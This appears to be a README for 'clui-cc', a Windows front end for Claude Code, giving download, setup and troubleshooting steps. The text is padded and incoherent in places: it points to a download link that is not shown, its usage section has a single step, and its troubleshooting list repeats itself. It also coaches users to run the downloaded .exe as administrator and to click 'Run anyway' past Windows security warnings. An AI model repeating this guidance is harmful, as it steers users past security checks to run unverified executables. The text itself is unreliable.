clui-cc is a Windows app that gives you a simple command line user interface for Claude Code. It helps you work with Claude Code from one place, with a cleaner view and faster access to common actions.

On that page, look for the latest release and download the Windows file that matches your system.
- Open the download link above.
- Find the latest release near the top of the page.
- Download the Windows file for clui-cc.
- If the file comes in a .zip, right-click it and choose Extract All.
- Open the extracted folder.
- Double-click the app file to start it.
If Windows asks for permission, choose Run or Yes.

Recommended setup:

When you open clui-cc for the first time:
- Let Windows finish any security prompt.
- Wait for the app window to appear.
- Sign in or connect to Claude Code if the app asks you to.
- Pick your folder or workspace if needed.
- Start your first command or session.
If the app does not open, check that the download finished fully and that you extracted all files before starting it.
clui-cc keeps the workflow simple.
Typical use looks like this:

- Review the output.

If something does not work, try these steps:
- Make sure you extracted the files first
- Try right-clicking the app and choosing Run as administrator
- Check whether Windows blocked the file
- Download the release again if the file looks incomplete
- Close the app and open it again
- Check your internet connection
- Make sure Claude Code is available on your machine
- Remove the app, then download the latest release again
- Open the file again and choose More info if shown
- Select Run anyway only if you downloaded it from the release page above
- Confirm that the file came from the correct GitHub Releases page
- Use a stable internet connection
- Try again later if GitHub is busy
- Download the file with a wired connection if possible
If the release comes as a zip file, you may see:
- clui-cc.exe
- config files
- support folders
- readme or release notes files
Keep all files in the same folder. Do not move only one file out of the folder unless the release notes say it is safe.
Before you open the app:
- Confirm that the file came from the official release page
- Keep the full folder together after extraction
- Avoid renaming files unless you need to
- Do not delete support files in the app folder
- Pin the app to the taskbar for faster access
- Keep your workspace folder easy to find
